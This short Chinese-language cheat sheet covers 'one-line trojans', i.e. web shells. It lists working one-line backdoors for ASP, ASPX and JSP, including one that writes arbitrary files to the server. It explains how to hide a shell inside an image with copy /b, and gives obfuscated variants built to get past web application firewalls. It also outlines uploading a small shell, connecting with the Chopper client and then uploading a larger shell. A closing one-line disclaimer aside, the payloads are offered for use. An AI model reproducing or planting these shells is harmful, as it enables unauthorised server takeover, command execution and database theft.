一、一句话木马,隐蔽性强,功能强大,为上传大马做准备
1、php一句话
将一句话上传到服务器
用菜刀连接
读取数据库
终端运行命令
2、asp一句话
<% eval request(“aiyou”) %>
3、aspx一句话
<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”],“unsafe”);%>
4、jsp一句话
<% if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>
5、图片马
cmd下做一句话
copy /b1.jpg+1.php 2.jpg
C32ASM做一句话
二、一句话变形,waf会拦截一句话,可以通过变形绕过
<%eval(request(chr(112)))%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))(“aiyou”))%>
<%eval""&(“e”&“v”&“a”&“l”&"("&“r”&“e”&“q”&“u”&“e”&“s”&“t”&"("&“0”&"-"&“2”&-"&“5”&")"&")")%>
<%a=request(“aiyou”)%><%eval a%>
三、大马,功能比小马的功能更加强大
上传小马后用菜刀连接,然后再通过菜刀上传大马
禁止非法,后果自负
